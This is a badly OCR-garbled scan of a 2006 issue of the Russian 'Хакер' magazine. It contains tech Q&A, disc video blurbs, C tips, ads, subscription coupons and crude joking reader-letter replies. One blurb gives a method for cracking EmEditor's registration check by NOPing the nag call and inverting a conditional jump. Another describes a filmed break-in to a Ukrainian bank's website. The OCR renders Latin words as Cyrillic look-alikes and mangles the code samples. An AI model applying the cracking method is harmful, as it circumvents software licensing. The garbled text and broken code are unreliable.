( ѵѵѵѵѵѵ.зесигедзт.сот ). Мощный продукт, по- 
строенный на базе ѴѴіпбоѵѵз МоЬіІе, который 
шифрует весь голосовой трафик с помо- 
щью 256-битного ключа по алгоритмам АЕЗ, 
ТѵѵоТізІл , ЗегрепІ, а еще криптует зтз-сооб- 
щения. Хорошая реализация уникальных 
функций, но опять же — за них придется 
платить. 

О: Хочу написать приложения для 
удаленного управления компьютером 
через ВІиеіооіН. Что мне для этого 
понадобится? 

А: Чтобы не морочить себе голову внут- 
ренним устройством технологии ВІиеіооіб 
и сразу приступить к кодингу приложений, 
нужно установить подходящий фреймворк. 
Это специально написанный пакет модулей 
и компонентов, в которых уже реализованы 
все необходимые функции для использова- 
ния «синего зуба». Существует несколько 
походящих продуктов, но для тебя особен- 
но здорово подойдет ВІиеіооіН Ргаптеѵѵогк 
( ѵѵѵѵѵѵ.ЬДгатеѵѵогк. сот ). Фишка в том, что 
он заточе.н не под один конкретный язык 
программирования, а может одинаково хо- 
рошо работать и с ЭеІрНІ, и с СВиіІбег., и с , 
ѴізиаІ Зіисііо, и даже с ѴізиаІ Вазіс. Причем 
код написан на чистом ѴѴіпбоѵѵз АРІ, а.зна- 
чит, для работы твоей будущей программы 
не понадобится никаких дополнительных 
ПО и библиотек. В сам фреймворк включе- 
ны компонентьпдля сканирования эфира и 
поиска беспроводных девайсов, отправки 
и приема -зпгіз, передачи файлов-, работы с 
записной книжкой телефонов, синхрониза- 
ции и т.п. Причем на сайте разработчиков 
ты найдешь кучу примеров и сможешь почти 
сразу приступить к написанию своего Собс- 
твенного приложения. 
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О: Правда ли, что аккумулятор в ноутбу- 
ке может взорваться? 

А: Вообще аккумуляторы с,ами по себе не 
взрываются, но если речь идет о производс- 
твенном браке, то запросто. Круче всех нако- 
сячила компания 8опу. Колйчество отозван- 
ных аккумуляторов ее п-роизводства не тысяча 
и даже не две. А целых 7,5 миллиона. Хуже 
всего то, что бракованные аккумуляторы ис- 
пользуются в ноутбуках ЭеІІ, ТозбіЬа, І_епоѵо и 
ІВМ, Рщкзи и Нііасііі, то есть почти всех ведущих 
производителей. Наиболее пострадавшая 
компания ЭеІІ даже открыла специальный сайт 
( ѵѵѵѵѵѵ.беІІЬаІІегургодгат.сот ). где на восьми 
языках подробно изложен порядок определе- 
ния пожароопасной батареи. В список подле- 
жащих замене попали свыше 30-ти моделей из 
серий І_аіііисІе, Іпзрігоп, Ргесізіоп и ХР8. Реко- 
мендую пробить серийный номер своего ноута 
и в случае необходимости поменять аккумуля- 
тор в сервисном центре. 

О: Что такое йМ2? 

А: ЭМ2 (Эетііііагігеб 2опе) — это дополни- 
тельная возможность большинства современ- 
ных маршрутизаторов. Нужна она для того, 
чтобы пользователи инета могли обратиться к 
некоторым внутренним, то есть находящимся 
за маршрутизатором и защищенным ІМАТ’ом, 
серверам. Вот, например, допустим, у тебя 
есть небольшая локальная сеть, которая выхо- 
дит в инет через АЭ8І_-модем. Один из пользо- 
вателей запустил у себя на компьютере сервер 
для игры в Соипіег-8ігіке и ждет подключений 
извне. Только вот подключиться к нему из 
инета не получится: он, как и все остальные 
компьютеры локалки, имеет внешний ІР-адрес 
модема, что препятствует подключению к нему 
напрямую. В этом случае обычно настраивает- 
ся рогі тарріпд (иногда этот прием называют 
ѵігіиаі зегѵег), то есть переадресация запро- 
сов, .поступающих на определенные порты 
сервера, компьютеру в сети. Получается эда- 
кая ретрансляция, которая хорошо работает 
и решает поставленную задачу. Но что если 
нужно открыть сразу все порты? Не настраи- 
вать же переадресацию для каждого? В отли- 
чие от рогі тарріпд’а, с помощью ЭМ2 можно 
наладить переадресацию сразу всех запросов 
с внешнего интерфейса (в нашем случае — с 
АЭ8І_-модема), после чего все открытые порты 
на нужном компьЮтере"будут‘достуПны снару- 
жи. Достаточно лишь указать его адрес. ЗС 
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О Реверсинг редактора ЕтесШог 

В этом ролике я покажу, как можно обой- 
ти проверку регистрационного номера 
и убрать назойливое окно при запуске 
ЕтЕсІіІог'а. Случай довольно банальный: 
если введенный серийник неверен, про- 
грамма выдает стандартный МеззадеВох 
с ошибкой. Хорошо бы от него избавить- 
ся — этим и займемся. Посмотрев, откуда 
вызывается МеззадеВох, обнаруживаем 
одну любопытную вещь: окошко выска- 
кивает в случае ввода как верного, так 
и неверного регистрационного ключа. 
Теперь нам нужно найти команду, которая 
решает исход операции, и поправить ее. 
После подробного анализа стало ясно, 
что прога читает зашифрованный ключ 
из реестра. Но поскольку разбираться в 
алгоритме шифрования у меня не было 
ни сил, ни желания, я решил пойти более 
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простым путем. Итак, находим место, от- 
куда вываливается окошко, забиваем его 
пор'ами и идем дальше. Попадаем прямо 
наМеззадеВох, который выводиткакое-то 
предупреждение. Видим, что сообщение 
выпрыгивает при определенном условии, пос- 
лечего меняем условие на обратное. И вот 
результат — теперь программа работает 
так, как это нам этого хочется. 

Автор: гооі 

О Первое место в гугле, или извраща- 
емся над Орега 

В ролике ты увидишь, как мы издеваемся 
над браузером Орега, добиваясь перво- 
го места в рейтинге гугла по поисковому 
запросу «Журнал». Все это нам удается 
с помощью хитроумной сІІІ'ки, грамот- 
но написанной мега кодером Бугром. На 




использования шпионской программы — 
более подробно об особенностях ее напи- 
сания читай в соответствующей статье. 

Автор: Бугор 

О Проникновение в ба нк 

Это видео является доказательством 
взлома сайта Сбербанка Украины. В нем 
ты увидишь, как хакер находит уязвимый 
сценарий и проникает на сервер. После 
этого выдирает пароли для доступа к раз- 
делам администрирования ресурсом. Через 
некоторое время сайт банка оказывает- 
ся под контролем взломщика. Внимание! 
Все действия хакера противозаконны! 
Все это сделано только для того, чтобы 
показать, насколько уязвимы информа- 
ционные системы, даже столь серьезных 
финансовых учреждений. 

Отройков (гОісІ@таіІ.ги) 
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Бумеранг всегда возвращается 

Имея в своем распоряжении функцию цик- 
лического сдвига, мы можем выполнять 
эффективный разворот, отображение и 
другиетипы трансформаций геометричес- 
кихфигур. Главное — выбрать правильную 
схему отображения байт сдвигаемой пе- 
ременной на байты двумерного массива с 
геометрической фигурой внутри. 

В самом деле, и разворот, и трансформа- 
ция по сути своей являются сдвиговыми 
операциями, что приведенный ниже при- 
мер, собственно говоря, и подтверждает: 




//кодируем «пропеллер» в двухмерном массиве,! 
// развернутом в линейный массив, Щ 
// представленный двойнымсловом^И 



I 



//* <- «бумеранг»! 

ипіоп {іпіои; сГіаг ио [4];} ххх;| 




!ог (х=0; х <8: х++)^[ 

// выбираем схему отображения^ 
// реализующую разворотД 
р г і п II ( " % с % с\п % с % с\п\п " , ххх. ио [0] 
ххх. ио [3], ххх. ио [1], ххх. ио [2])і| 
ххх. ои=РОЦхххГоф8)|^И 



Я 

Откомпилировав программу и запустив ее 
невыполнение, мы получим следующий ре- 
зультат, для экономии бумаги записанный в 
одну строку: 




Как видно, «бумеранг» исправно вращает- 
ся против часовой стрелки (или по часовой 
стрелке, если используется функция ВОВ), 
но стоит нам выбрать другую схему отоб- 
ражения, каквместо вращения мы получим 
зеркальное отображение. Для этого в на- 
шей программе достаточно изменить всего 
одну строку: 



рлпЩ|%с%с\^ 

ххх. ио [0], ххх. ио [1], ххх. ио [2], ххх. ио [3]); 




Теперь каждая последующая трансформа- 
ция «бумеранга» представляет собой зер- 
кальное отображение предыдущей! 
Слегка усовершенствовав функцию цик- 
лического разворота, мы сможем транс- 
формировать не только массивы 2x2, но и 
гораздо большие фигуры. 




Вещественная арифметика в целых 
числах 

Прошло то время, когда математический 
сопроцессор считался предметом гордос- 
ти его владельца. Теперь это неотъемле- 
мая часть процессора, однако скорость 
сложения/вычитания вещественных чисел 
заметно отстает от целых, и потому в прило- 
жениях, критичных к производительности, 
использование целочисленных перемен- 
ных является более предпочтитель- 
ным. А как быть, если нам нуж- 
на дробная часть? Очень 
просто. 



Умножаем целое число на 10*14 (где N ^ ко- 
личество знаков после запятой) ’й даЛьше 
работаем с ним как обычно, а на финаль- 
ном этапе., вычислений делим : р.езуяътат 
на 10*1\І. 



Однако, используя этот прием, следует 
помнить о том, что операции умножения/ 
деления на 10 нельзя реализовать через 
битовые сдвиги, а операция целочислен- 
ного деления на х86 выполняется крайней 
медленно и неэффективно. Намного' менее 
эффективно, чем операция вещественного 
деления! Поэтому преобразование типов 
съедает львиную долю выигрыша ог произ- 
водительности и оправдывает себя лишь в 
с л у чаё'действител ьно громоздких в щи с - 
лений, когда временем, потраченным 
на преобразование, можно пре- 
небречь. .Но и в этом случае в 
целочисленных вычислениях 



; не должно присутствовать инструкций де- 
^ пения, иначе лучше все-таки использовать 
^ вещественную арифметику и не выпендри- 



$ ватьоя. 



* нй! ■ л \ . | Щ 3 " I Щ Ш і шияв 

:.. Разумеется, ..под «делением» (равно как и 

взятием остатка) имеется в виду «деление 
На число, не являющееся степенью двой- 
ки». Кстати говоря, существуют формулы 
быстрого деления/взятия остатканалюбую 
константу, и некоторые компиляторы (в том 
Числе. иі’МісгозоН ѴізиаІ С ++) используют 
их,. придавая производительности неожи- 
дан ноеподкрепл ение.Такчто вопрос отом, 
какую арифметику лучше всего использо- 
вать, — ■остается открытым. Это зависит и 
Ібт-типа процессора, и от интеллектуаль- 
ности компилятора, и от многих других ве- 
щей, поэтому, прежде чем приступать.к оп- 
йтимизацйи, следует внимательно изучить 
|| конкретную оперативную обстановку. □С 

ИЙШІР 
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Побывал в далеких странах? 
Накопилось много интересных 
фотографий? 



Создай свой цифровой фотоархив на 

ЫІрУЛоІо.таіІ.гц/ и покажи друзьям! 

1. Доступ из любой точки мира 

2, Удобная система альбомов 

3. Редактирование фотографий 

4, Возможность ограничения доступа только для друзей 

5, Рейтинги лучших фотографий 

6. Творческие конкурсы с призами 

Фото<§)таіІги* 

Ваш личный цифровой фотоархив! 





в продаже 
с 1 ноября 



Если при нажатии 
на кнопку двигатель 
не завелся - срочно 
купите журнал 





РЕДАКЦИОННАЯ 

ПОДПИСКА 



С 1 ОКТЯБРЯ ПО 31 ДЕКАБРЯ ПРОВОДИТСЯ 
СПЕЦИАЛЬНАЯ АКЦИЯ ДЛЯ ЧИТАТЕЛЕЙ ЖУРНАЛА 



И ЭТО НЕ ВСЕ! 



31 ДЕКАБРЯ СРЕДИ ЧИТАТЕЛЕМ, 
ОФОРМИВШИХ ПОДПИСКУ НЙ 
БУДЕТ РАЗЫГРАНО 200 МРЗ □ 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖ 



ЗА 12 МЕСЯЦЕВ 



При подписке на комплект журналов 
ЖЕЛЕЗО РѴй + ХАКЕР 0Ѵ0+ ХАКЕР СПЕЦ СО: 

1 . годовая подписка по цене 1 1 номеров! - это 3 номера в подарок 

2. ДОПОЛНИТЕЛЬНО СКИДКА 10% на весь комплект 

3. плюс бесплатная подписка на любой журнал (даппе)іапсі на 3 месяца! 



ПЛЮС ПОДАРОК 

ОДИН ЖУРНАЛ 
ДРУГОЙ ТЕМАТИКИ 



ОФОРМИВ ГОДОВУЮ ПОДПИСКУ В РЕДАКЦИИ, ВЫ МОЖЕТЕ 
БЕСПЛАТНО ПОЛУЧИТЬ ОДИН СВЕЖИЙ НОМЕР ЛЮБОГО ЖУР- 
НАЛА, ИЗДАВАЕМОГО КОМПАНИЕЙ «ГЕЙМ ЛЭНД»: 

• ЯНВАРСКИЙ НОМЕР — ПОДПИСАВШИСЬ ДО 30 НОЯБРЯ, 

• ФЕВРАЛЬСКИЙ НОМЕР— ПОДПИСАВШИСЬ 
ДО 31 ДЕКАБРЯ. 



ВПИШИТЕ В КУПОН НАЗВАНИЕ ВЫБРАННОГО ВАМИ ЖУРНАЛА 
ЧТОБЫ ЗАКАЗАТЬ ПОДАРОЧНЫЙ НОМЕР 



СКА ПО ЦЕНЕ 11 НОМЕРОВ! 



1980 руб 



Ваша награда за покупку журнала 

Уникальный 
бонусный номер 



999 658 887 120 
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ВЫГОДА и ГАРАНТИЯ и СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ внимание! 



1. Разборчиво заполните подписной купон и квитанцию, 
вырезав их из журнала, сделав ксерокопию или распе- 
чатав с сайта \ллллл/.дІс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов— 
купона и квитанции —любым из нижеперечисленных 
способов: 

по электронной почте $иЬ$сгіЬе ідіс.ги; 

I по факсу 8 (495) 780-88-24; 

Н по адресу 119992, Москва, 
ул. Тимура Фрун , д. 11, стр. 44-45, 

ООО «Гейм Лэнд», отдел подписки. 



* '' 




одписка оформляется в день обработки 
лона и квитанции в редакции: 

в течение пяти рабочих дней после отправки подписных 
документов в редакцию по факсу или электронной почте; 
в течение 20 рабочих дней после отправки подпис 
документов по почтовому адресу редакции. 

Рекомендуем использовать факс или электронную 
почту, в пос >д і случае предварительно отсканиро- 
вав или сфотографировав документы. 

Подписка оформляется с номера, выходящего через один 
календарный месяц после оплаты. Например, если вы произ- 
водите оплату в ноябре, то журнал будете получать с января. 



ПОДПИСКА НА ЖУРНАЛ «ХАКЕР» на 6 месяцев СТОИТ 1080 руб. ПОДАРОЧНЫЕ ЖУРНАЛЫ ПРИ ЭТОМ НЕ ВЫСЫЛАЮТСЯ 



ПО ВСЕМ ВОПРОСАМ СВЯЗАННЫМ С ПОДПИСКОЙ, ЗВОНИТЕ ПО БЕСПЛАТНЫМ ТЕЛЕФОНАМ 
8(495)780-88-29 (ДЛЯ МОСКВИЧЕЙ) И 8(800)200-3-999 (ДЛЯ ЖИТЕЛЕЙ ДРУГИХ РЕГИОНОВ РОССИИ, АБОНЕНТОВ СЕТЕЙ МТС, 
БИЛАЙН И МЕГАФОН). ВОПРОСЫ О ПОДПИСКЕ МОЖНО ТАКЖЕ НАПРАВЛЯТЬ ПО АДРЕСУ ІМРО@ОЮ.І?и ИЛИ ПРОЯСНИТЬ НА 

сайте ѵаш.ѳю.рі) ПОДПИСНОЙ КУПОН 



ПРОШУ ОФОРМИТЬ ПОДПИСКУ НА ЖУРНАЛ «Хакер» 

— — — — — — — — — — — — -| 



I I на журнал Хакер ЭѴй 
I I на комплект Хакер ОѴЭ + Железо О\Л0+ 
+ Хакер Спец СО 



□ на 6 месяцев 
] на 12 месяцев 



200 г. 



Прошу выслать бесплатный номер 
журнала 



□ 



Доставлять журнал почтой 
по домашнему адресу 



I — I Доставлять журнал курьером 
I — I по рабочему адресу (в Москве) 

Подробнее о курьерской доставке читайте ниже 



(Отметьте в квадрате выбранный вариант подписки) 

Ф.И.О. 



Дата рожд. ПП. ПП. ППг. 

день месяц год 

АДРЕС ДОСТАВКИ 

Индекс 

Область/край 

Город 

Улица 



Дом 



Корпус 



Квартира/офис 



Телефон ( 



Е-таіІ 



Сумма оплаты 



^Курьерская доставка осуществляется только в Москве по 
рабочему адресу подписчика. Для оформления доставки 
курьером укажите в подписном купоне адрес и название 



Извещение 



Кассир 



Квитанция 



Кассир 



ИНН 7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 



КПП 772901001 



Плательщик 



Адрес (с индексом) 



Назначение платежа 




Сумма 


Оплата журнала « 


» 




с 


200 г. 





Ф.И.О. 



Подпись плательщика 
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АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 



КПП 772901001 



Плательщик 



Адрес (с индексом) 



Назначение платежа 




Сумма 


Оплата журнала « 


» 




с 


200 г. 





Ф.И.О. 



Подпись плательщика 




На вопросы отвечал практикующий врач-терапевтЛозовский 



Владимир ( иго ѵѵап_2004@т аіі. ш) 

Очень на а о/ 

Здравствуйте, дорогая редакция журнала! Подскажите, пожалуй- 
ста, в каком году и в каком номере в рубрике «Обзор дисков» была 
ваша рецензия на диск «Энциклопедия секса». Очень надо! 

Вот это ты написал по адресу! Кстати, очень сексуальноутебя по- 
лучилось это — «дорогая редакция». Может быть, в этом повинен 
твой особый электронный шарм, но наша литред Анна Большова 
(ну и что, что ее уволили, из редакции она по неизвестной причи- 
не уходить не хочет, так и живет тут) прямо-таки возбудилась от 
твоего письма! В общем, ты прав. Мало кто знает о сексе больше 
нас. Сам понимаешь, популярные журналисты известного изда- 
ния проводят время никак не скучнее рок-звезд! Пьянки, безум- 
ные оргии и ужасный разврат — самые обычные для нас вещи, мы 
даже делали (в годы безумной юности нашего журнала) пару но- 
меров «Спеца» и «Хакера», посвященных этой трогательной теме. 
Кстати, насчет порева — был же и «Хакер», в некотором роде 
посвященный порнобизнесу. Но вот чтобы мы печатали рецензии 
на чужие труды (зачем нам чужие, когда своих вагон?), такого не 
припомню. Поэтому мой тебе совет — достань эти наши номера и 
испей из бездонного колодца нашей сексуальной мудрости, пе- 
ред коей меркнет мудрость Ву Сыня и Кама Сутры. Удачи, и да не 
потеряет своей твердости твой нефритовый стержень! 
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ѵапек (ѵапек_23@таіІ.ги) 

Без темы 

Привет, чуваки! Вы крутые перцы! Читаю ваш журнал уже года 4 и 
скажу вам честно, он изменился. . . Не сказать, что в худшую сторо- 
ну — дизайн стал круче, статейки интереснее! Только вот куда вы 
дели треп с читателями? Интересно было читать, хотя и сам не раз 
писал, но, увы, безрезультатно. А может, номера телефонов выду- 
маны? Хотя, наверное, у вас нет времени на меня... Хочу сказать вам 
«Огромное спасибо!» за ваш журнал, он меня достаточно многому 
научил! Желаю вам удачи, новых идей, хороших партнеров! Ваш 
журнал самый здравый! ВезресШ! 

Р. 5. Надеюсь, мое электронное письмо не останется без ответа. 

Уважаемый Ванек! Мы, и правда, очень крутые перцы. Собственно, 
прочтя предыдущий мой ответ, ты наверняка и сам все уже понял. 
Конечно же, свои (настоящие) телефоны мы давали вовсе не для 
того,чтобынамзвонили брутальные волосатые мужики и пропитым 
голосом требовали аську Форба (однозначный хит!), мыло Билла 
Гейтса или дать по заднице Бублику. Мы просто-напросто искали 
контакт с поклонницами (длинноногими голубоглазыми блондин- 
ками идеальных пропорций), чтобы помочь им настроить непечата- 
ющую мышку или поставить винду, которая глючит (акцию «Муж на 
час» надо понимать во всех смыслах этого слова!). Сам понимаешь, 
что во время душевных разговоров с дамами, мадамами и мамзеля- 
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^ ипі*2 



тада2Іпе@геа1.хакер.ги 



ми мы были абсолютно рефрактерны к мужским звонкам! Наверное, 
тебе просто не повезло. А рубрика эта исчезла, как ты понимаешь, 
после того как мы набрали критическую массу поклонниц, впали в 
тоску и депрессию, а наши нефритовые пики стали подобны тон- 
ким осинам, клонящимся под южными муссонами. Мы нуждались 
в отдыхе, и мы его себе обеспечили! Теперь мы снова в тонусе, но 
рубрику пока не вернем. 

таІе_асІтіп// %10%40%20// 
(е_таіІ_асІтіп@таіІ.ги) 

Статьи 

Здрасти. Я не читаю ваш журнал. Я вообще ничо не читаю, кроме 
книжек по кодингу и научной литературы. Занимаюсь вэб-дизай- 
ном, программированием и вообще дизайном. На жись зарабаты- 
ваю в основном ЯазН'ем. Хочу писать по нему обучающие статьи, 
основанные наличном опыте кодинга и дизайна. Думаю вот, может, 
вы заинтересуетесь. Вопрос номер раз — как вы к этому относи- 
тесь, номер два — скока платите ;)? С грамматикой все в порядке, 
язык подвешен, вроде нетуп =). Лет мине 20, зовут Мохтаров Марат. 
Учусь на 4-м курсе по специальности АСОИиУ. Работаю вэб-дизай- 
нером и еще в одной фирме за компами слежу, шоб работали =). 
Вота. Надеюсь на сотрудничество. Мы нужны друг другу =). 

Приветствую! И правильно делаешь, что ничего не читаешь. Еще со 
времен кота Базилио известно, что от чтения портится зрение (да, 
именно отчтения, анеотонанизма, кактебе, наверное, рассказывали 
в детстве). Кроме того, книжки собирают на себе пыль, а пыль — ис- 
точник аллергии и агрессивных пылевых клещиков, которых можно 
достать не каждым пылесосом. Опс, пропустил! Оказывается, книжки 
ты все же читаешь. Правильно делаешь, они — знание, а знание — 
сила. Если ты действительно хочешь проявить свои знания в нашем 
журнале, тебе нужно будет доказать свое право на это, пройдя стан- 
дартную процедуру возмужания: охоту на вепря с рогатиной, выковку 
личного оружия в старой кузнице, обряд соития с десятью девствен- 
ницами (на обряд приходить со своим реквизитом) иѵсамый главный 
тест — решение задачек с портала агатоіа.ги на время. В общем, шли 
мне (или любому другому редактору, мыло можешь найти в эдиториа- 
ле) свои темы с планами статей — разберемся. 

Кулаков Сергей ($кооІ@кгазпокатеп$к.ги) 

Жалоба на ОУО 

Здравствуйте, работники редакции журнала «Хакер». Хочу пожа- 
ловаться на ваш ЭѴЭ (08 (92) 2006) — не читается, гад, хотя с виду 
и не одной царапинки. Вы уж разберитесь, пожалуйста, а то как-то 
нехорошо получается. Выписываю журнал по почте. 

Привет тебе, о человек с сексуальной фамилией! Конечно, Кулаков — 
это не Кулакова (кстати говоря, за рубежом аналогом Дуни Кулако- 
вой является Мисс Палмер с ее пятью дочерьми), но должен же я 
был сказать тебе что-то приятное (многие люди считают, что я только 
издеваюсь над читателями, поэтому демократы наложили на меня 
требования, каккамериканским фильмам, — я должен писать втом 
числе и приятные вещи, а в ответах в обязательном порядке дол- 
жны присутствовать блондинки, секс и чернокожие полицейские с 
пончиками). Так вот, теперь неприятное. В удивительном качестве 



наших ЭѴЭ виноват, конечно же, отечественный производитель, ко- 
торый знаеттолкв бракованной продукции. Дискты всегдаможешь 
заменить в редакции (и даже автограф можешь там получить!), по- 
этому спишись со Степом и договорись. 

Борис Дергачев (коех@гатЫег. ш) 

Закачка журнала 

Здравствуйте! Я обожаю Ваш журнал, хоть многое и не понимаю. 
Но все-таки я не смог купить первый выпуск журнала. Я знаю, что 
все выпуски Вы выложили на своем сайте. В мире интернета я про- 
стак; и хотелось бы, чтобы Вы мне объяснили, какзакачать все стра- 
ницы сайта, связанные с журналом, чтобы читать его, не запуская 
интернет. Он ведь у меня через телефонную линию. Надеюсь, Вы 
поняли мою проблему и ответите мне. 

Заранее благодарен, Борис. 

Уважаемый Борис! Дело втом, что для скачивания с сайта множес- 
тва страниц с целью последующего их просмотра принято пользо- 
ваться целым классом программ под названием «оффлайновые 
броузеры». К ним относятся: классика — ТеІерогіРго, а кроме того 

— ѴѴеЬВеарег и ОіЛіпеЕхрІогег (последний весьма крут). Кстати, 
с телефонными линиями-то пора завязывать, в 2006 году неко- 
шерно звонить на модемные пулы! Если ты настоящий фанат «X», 
пообещай подключиться через АЭЗІ_ или выделенку, сделай нам 
приятное. Учти, придем и проверим! 

Алексей Помыканов 
(ротукапоѵ92@таіІ.ги) 

Без темы 

Здравствуйте, я постоянный читатель журнала «Железо». Недав- 
но я начал создавать сайт о тестировании и обзорах процессоров, 
материнок и т.д. Пожалуйста, разрешите перепечатку некоторых 
материалов, естественно, с подписью о первоисточнике. Со своей 
стороны буду рад предложить вам бесплатное размещение рекла- 
мы на своём сайте. 

С уважением, Алексей. 

Здравствуй! Мне очень по-человечески приятно, что ты постоян- 
но читаешь журнал «Железо». Уж не знаю о чем этот журнал, но, 
наверное, о всяком современном железе и его испытаниях. Фалло- 
имитаторах,страпонах и наручниках. Тогда при чем тут процессоры 
и материнки?Они же не имеют к этому никакого отношения! Кроме 
того, непонятно, почему ты хочешь спросить разрешения именно 
у редакции «Хакера»? Это связано с каким-то внутренним комплек- 
сом, может быть, ты хочешь об этом поговорить? Не исключено, это 
твое обращение на нашу почту является классической опиской по 
Фрейду, указывающей на тот факт, что подсознательно тебе хочется 
пообщаться именно с нами. В таком случае мой ответ традиционный 

— обратись на горячую линию блондинок Степа, у них нет запретных 
тем! Однако должен тебя предупредить, что тема низкоомных виб- 
рочепцов, квантовых фаллосороботов и прочих малотранзисторных 
внутригипоталамических оргазмотронов на термопарах все-таки от- 
носится к компетенции ребят из «Железа» , поэтому, если тебя волну- 
ют различные аспекты цифрового самоудовлетворения (мы уверены, 
что это не так, просто на всякий), пиши лучше им. □С 
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НАДЕРИ НАС В С5 

О АТЕ: 26 ноября 

І-ОСАТІОІЧ: Популярный компьютерный клуб в Москве 
ЕѴЕІЧТ: Чемпионат по СЗ и ОЗ с читательскими командами 

ОЕЗСВІРТІОІЧ: Акция — для организованных команд. Заявки нужно присылать на сНатр@геаІ. хакер. ш. Еслиты не состоишь 
ни в одном из кланов, все равно пиши — объединим одиночек :). Также будет возможно удаленное участие через инет, а москвичи 
смогут посмотреть нашу хакерскую презентацию, поучаствовать в конкурсах, потусоваться и выпить пива с редакцией. Все под- 
робности — 20 числа на іогит.хакер.гц . 



/ 1КП 
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С іб октября по 30 ноября прими участие в настоящей Іаѵа-битве! 

Победителей чемпионата ждут ноутбуки, смартфоны, игровые консоли! 
Для участия в чемпионате отправь 5М5 на номер 1110 *, скачай 



по ѴѴАР-ссылке бесплатные** Іаѵа-игры и отправляй*** свои результаты! 



Настоящая Іаѵа-битва началась! 



Итоги чемпионата будут подведены 15 декабря 2006 г. 

Подробности и условия акции - в офисах продаж и обслуживания, а также на сайте ѵѵѵѵѵѵ.тееа^опрго.ги/еатег 



*Отправка 5М5-сообщения на номер то бесплатна. 

**Стоимость ѴѴАР-трафика оплачивается согласно твоему тарифному плану. 
***Стоимость отправки результата в турнирную таблицу - 30 руб. с учётом НДС. 

Лицензия №№ 10010, 13282, 14404, 15002, 15409, 15410, 15411, 15412, 
16338, 20377 Министерства РФ по связи и информатизации. 

На правах рекламы. 



МЕГАФОН 



( ^ 

О 





Во Вла 



ачества 



Яркое насыщенное изображение 

Жидкокристаллический монитор И 7505С-5М Ріаігоп 
Видимая область 1 7" (43. 1 8 см) Дочка 0.264 х 0,264 мм 
Яркость 250 кд/м2 - типичная /Контрастность 500:1 - типичная 
Подсзетка 4 лампы ССРІ. /Угол обзора 160' по горизонтали, 160 е по вертикали 
Время отклика 8 мс /Глубина цвета 16.2 млн, цветов 
Соответствие стандартам ТСО’ОЗ /Разрешение 1280х1024@75 Гц 



Информационная служба Ш ВесІгстіс$ 8-800-200-76-76 (бесплатная горячая линия по Росии) ѵлѵю.Ід.щ 




ю 

ѵѵѵѵѵѵ.Ід.ш 




Москва: Ргопеі Сгсшр (495)789-38-46, Москва: Неоторг {495)223 23 23, Москва,: розничная сеть Роіаііа (495) 755 55 57, Москва: Ф- Центр (495) 472-64 01, 
Мнжва: N1 Сотри (ег (495) 979-19-30, Москва: Техносила (495} 777-87-77,Мнжва: Компания Кит (495)777-66-55, Москва: Паке (495) 236-99-25, Москва: 
АБ-групп (495) 745-5175, Москва: Сетевая Лаборатория (495)784-64-90,. Москва: І5М (495) 713-40-20, Москва: Никс (495) 974-33-33, Москва: ОЛДИ 
(495) 105 07-00, Москва: УЗМ СотриІегБ 1495)221 -72-97, Москва: Старі-Масіер (495) 935-38 -52, Москва: А*апек(495) 734-72-24, Москва: Эльдорадо 
(495) 500-00-00, Москва: Ккбертроника (495) 504-25-3 1 .Москва: Дилайн(495) 969 -22- 22, Москва: ІЛТВА Сотриіега (495) 775-75-66, 729-52-55, Гомель: 
ДЕЛ (495)250-55- 36, Пврьм: Гаском (3422) 36-37-75, Волгоград: Волгоградрромграмситема (3442) 90-30-30, Моасва: Алмер (495) 101-39 25, Москва: 
Микрооет (495) 924-27-47, Москва: Гипермаркет Санрайа Про (495)542-60-70, Санкт-Петербург: ДВМ- Нева (8 12] 325-11 -05, Нижневартовск: Ланкорд 
(3466) 61 22-22, Краснодар. Иманго- Краснодар (861) 2551 -552 , 2510-915, Новосибирск. Квеста (38322)332 407 г Новосибирск: Арсиситек(ЗЗЗ) 221 16-39, 
Волгоградском (8442) 97-59-37,Н№*ннй Новгород: АйТиОн (83 12) 74-85-89 Дюмень: Инэкс- Техника (3452)39-00-36, Электросталь: Домотехника (257) 
21 433 Иркутск: Комтек (3962) 253338, 1 Йркутск: Билайн (3952) 24-00 24, Красноярск: Альдо (3912} 21 1 1 45ДІИПЩК: РвгардТур (0742) 43-45-73, Воронеж 
Сани (0732) 54-00-00, Воронеж: Рет (0732) 77-93-39, Томск: Стек (3022) 55-71 43, Рязань: ДВК (0912) 90-00 00, Гомель: Компьютер Маркет 
(0232) 43- 10-43, Тюмень: Торговый дом 'Весы-’ (3452)75-00-00 1 0рен6ург Гермес- Те лвком(3532)536-565, Омск: Технопарк (3312) 57-93-1 9, Альметьевск: 
Компьютерный мир (3553) 25-98-48, Воронеж: РИАН (4732)512-412, Лабытнанги: КЦ Ямал (34992)5 1-777, Ижевск: ЭЛМИ(3412) 50-50-50, Омск: Лик -2000 
(3312)229-700 

"Дина Виктория" официальный дистрибьютор мониторов компании Ід сівсіголісз на территории РФ 

товар сертифицирован 




на правы рекламы 
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